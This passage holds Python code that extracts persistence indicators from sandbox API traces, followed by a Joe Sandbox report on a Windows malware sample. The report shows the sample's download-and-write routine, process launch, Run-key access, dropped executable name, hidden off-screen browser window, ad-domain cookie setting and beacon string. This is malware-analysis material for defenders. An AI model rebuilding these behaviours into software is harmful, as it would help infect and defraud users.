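PE_HEADER_SIZES = {0x40: "sizeof(IMAGE_DOS_HEADER)", 0xF8: "sizeof(IMAGE_NT_HEADERS32)"}


class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: int


class PersistenceIOCs(NamedTuple):
    run_keys: List[str]
    value_names: List[str]
    file_names: List[str]
    switches: List[str]


def parse_api_line(line: str) -> Optional[Call]:
    """Parse one '• Api.Module(args), ref: addr' line; None for anything else."""
    m = API_LINE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def _hex(arg: str) -> Optional[int]:
    try:
        return int(arg, 16)
    except ValueError:  # '?' means the sandbox could not recover the value
        return None


def decode_call(call: Call) -> str:
    """Turn the raw hex arguments of the interesting calls into readable notes."""
    if call.api == "CreateFileW" and len(call.args) >= 5:
        access = _hex(call.args[1]) or 0
        names = [n for bit, n in ACCESS.items() if access & bit] or [hex(access)]
        disp = DISPOSITION.get(_hex(call.args[4]), call.args[4])
        return f"CreateFileW access={'|'.join(names)} disposition={disp}"
    if call.api in ("ReadFile", "WriteFile") and len(call.args) >= 3:
        size = _hex(call.args[2])
        if size is None:
            return call.api
        hint = PE_HEADER_SIZES.get(size)
        return f"{call.api} {size:#x} bytes" + (f" (matches {hint})" if hint else "")
    if call.api == "RegOpenKeyExW" and len(call.args) >= 2:
        return f"RegOpenKeyExW {HIVES.get(_hex(call.args[0]), call.args[0])}\\{call.args[1]}"
    return call.api


def extract_persistence_iocs(calls: List[Call], string_ids: List[str]) -> PersistenceIOCs:
    """Run-key paths come from the registry calls; names, files and switches from the strings."""
    run_keys = [f"{HIVES.get(_hex(c.args[0]), c.args[0])}\\{c.args[1]}" for c in calls
                if c.api == "RegOpenKeyExW" and len(c.args) >= 2
                and c.args[1].lower().endswith(r"\currentversion\run")]
    file_names = [s for s in string_ids if s.lower().endswith(".exe")]
    switches = [s for s in string_ids if s.startswith("/")]
    value_names = [s for s in string_ids
                   if s not in file_names and s not in switches and "\\" not in s]
    return PersistenceIOCs(run_keys, value_names, file_names, switches)


def flag_run_entries(entries: List[Dict[str, str]], iocs: PersistenceIOCs) -> List[Dict[str, str]]:
    """Return Run-key values whose name or command line matches the extracted IOCs."""
    files = [f.lower() for f in iocs.file_names]
    return [e for e in entries
            if e["name"] in iocs.value_names or any(f in e["data"].lower() for f in files)]


if __name__ == "__main__":
    calls = [c for c in map(parse_api_line, SAMPLE_API_LINES.splitlines()) if c]
    for c in calls:
        print(f"{c.ref:08X} {decode_call(c)}")
    iocs = extract_persistence_iocs(calls, SAMPLE_STRING_ID.split("$"))
    print(iocs, flag_run_entries(SAMPLE_RUN_ENTRIES, iocs))
```

                  On a live host the entries list would come from enumerating both Run keys the sample opens (HKCU and HKLM); matching on the value name alone is brittle because it is trivially changed between builds, so the check also matches the dropped file name in the command line.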

                  Control-flow Graph

                  APIs
                  • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CharLower$CommandFileLineModuleName
                  • String ID: /nomove
                  • API String ID: 1338073227-1111986840
                  • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                  • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                  Control-flow Graph

                  • Basic blocks: 407727-407751 call 40d5b0, GetModuleFileNameW; 407753-40776b call 4075d4; 407774-407797 ExpandEnvironmentStringsW, call 4075d4 (re-entered from 4077d2-4077dc); 4077a7-4077b5 and 4077bc-4077c8 GetLastError, then 4077ca-4077cf call 40a786; 4077e1-4077ea and 4077eb-4077ee return
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,771B0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                    • Part of subcall function 004075D4: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                  • String ID:
                  • API String ID: 1536607067-0
                  • Opcode ID: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                  • Opcode Fuzzy Hash: eafcbf4a8c3930913d522f5c7b72beb30a71f0d0c1af5e3f4189f884763461bb
                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                  Control-flow Graph

                  • Basic blocks: 4077f0-407829 call 40d530 (_memset on the STARTUPINFO/PROCESS_INFORMATION buffers), CreateProcessW
                  APIs
                  • _memset.LIBCMT ref: 00407800
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CreateProcess_memset
                  • String ID:
                  • API String ID: 1177741608-0
                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                  Control-flow Graph

                  • Basic blocks: 4069c0-4069fc RegQueryValueExW, RegCloseKey (single block, no branches)
                  APIs
                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                  • RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CloseQueryValue
                  • String ID:
                  • API String ID: 3356406503-0
                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                  Control-flow Graph

                  • Basic blocks: 407036-407069 DeleteFileW, CreateFileW; 40706b-407073 on create failure; 407078-407087 GetLastError; 407089-40708f SetEndOfFile; 407095-4070b6 InternetOpenUrlW; 4070b8-4070c4 CloseHandle on open failure; 4070c6-4070eb InternetQueryDataAvailable; 4070f2-407116 WriteFile; 407119-407121 InternetReadFile (loops back to WriteFile while data remains); 407123-40713b CloseHandle, InternetCloseHandle; 407147-407149 return
                  APIs
                  • DeleteFileW.KERNEL32(?), ref: 00407043
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                  • GetLastError.KERNEL32 ref: 00407079
                  • SetEndOfFile.KERNEL32(?), ref: 0040708F
                  • InternetOpenUrlW.WININET(?,?,00000000,80000000,00000000), ref: 004070A9
                  • CloseHandle.KERNEL32(?), ref: 004070BB
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                  • String ID:
                  • API String ID: 3711279109-0
                  APIs
                  • GetLocalTime.KERNEL32(?), ref: 004074AD
                  • GetLocalTime.KERNEL32(?), ref: 004074B3
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 3777474486-0
                  APIs
                  • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                  • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                  • __aulldiv.LIBCMT ref: 004072E3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$System$File$__aulldiv
                  • String ID: c{@
                  • API String ID: 3735792614-264719814
                  APIs
                  • GetForegroundWindow.USER32 ref: 0040A065
                  • CoCreateInstance.OLE32(0040E218,00000000,00000015,0040E238,?), ref: 0040A07E
                  • SetForegroundWindow.USER32(00000000), ref: 0040A088
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: ForegroundWindow$CreateInstance
                  • String ID:
                  • API String ID: 2498160819-0
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 00406CCF
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Version
                  • String ID:
                  • API String ID: 1889659487-0
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:

                  Control-flow Graph

                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,00420840,00001000,00000000,00000000,00000000,?,0040B320,00000000,?,0040B3E0), ref: 0040B103
                  • InternetSetPerSiteCookieDecisionW.WININET(begun.ru,00000005), ref: 0040B16F
                  • GetLastError.KERNEL32(00000004,?,0040B320,00000000,?,0040B3E0), ref: 0040B188
                  • CreateThread.KERNEL32(00000000,00000000,Function_0000B023,?,00000000,00000000), ref: 0040B1C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CookieCreateDecisionErrorFileInternetLastModuleNameSiteThread
                  • String ID: \netprotdrvss.exe$begun.ru
                  • API String ID: 2887986221-2660752650

                  Control-flow Graph

                  APIs
                  • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                  • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                  • String ID: hOA
                  • API String ID: 1355009786-3485425990

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: CountTick
                  • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                  • API String ID: 536389180-1762329985

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Sleep
                  • String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
                  • API String ID: 3472027048-1081452883

                  Control-flow Graph

                  APIs
                  • CharLowerW.USER32(?,?,?,?,?,?), ref: 0040933E
                  • SysFreeString.OLEAUT32(?), ref: 00409359
                  • SysFreeString.OLEAUT32(?), ref: 00409362
                  • SysAllocString.OLEAUT32(?), ref: 004093B8
                  • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                  • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: String$Free$Alloc$CharLower
                  • String ID: http:$javascript
                  • API String ID: 1987340527-3435494457

                  Control-flow Graph

                  APIs
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B2A
                    • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                    • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406B8C
                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Open$CloseQueryValue
                  • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                  • API String ID: 3546245721-1332223170
                  APIs
                  • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                  • SetParent.USER32(?,00000000), ref: 0040A1E2
                  • GetWindowLongW.USER32(?,000000EC), ref: 0040A1ED
                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0040A1FE
                  • SetWindowPos.USER32(?,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                    • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                    • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040A0CE
                    • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                  • String ID: Shell_TrayWnd$eventConn
                  • API String ID: 2141107913-3455059086
                  APIs
                  • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                  • GetLocalTime.KERNEL32(?), ref: 00407387
                  • GetLocalTime.KERNEL32(?), ref: 0040738D
                  • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                  • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                  • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                  • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                  • String ID:
                  • API String ID: 3166187867-0
                  APIs
                  • SysAllocString.OLEAUT32(?), ref: 004099EB
                  • SysAllocString.OLEAUT32(?), ref: 004099F9
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.1255148461.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255165038.0000000000405000.00000020.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255221038.000000000040E000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000001.00000002.1255244276.0000000000411000.00000004.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_cOviNFmw21.jbxd
                  Similarity
                  • API ID: AllocString
                  • String ID: </domain>$</url>$<domain>$<url>$http://
                  • API String ID: 2525500382-924421446
                  APIs
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                  • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                  • Sleep.KERNEL32(00002710), ref: 0040ADA4
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: Sleep$AttemptConnectInternet
                  • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                  APIs
                  • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                  • __FindPESection.LIBCMT ref: 0040D8AC
                  Memory Dump Source
                  • Source File: 00000001.00000002.1255165038.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  Similarity
                  • API ID: FindHandlersScopeSectionTableValidate
                  • String ID:
                  APIs
                  • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                  • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                  • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                  Strings
                  Memory Dump Source
